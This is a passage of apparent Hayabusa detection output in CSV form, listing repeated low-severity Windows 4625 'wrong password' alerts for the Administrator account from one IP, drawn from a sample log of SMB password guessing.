NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: 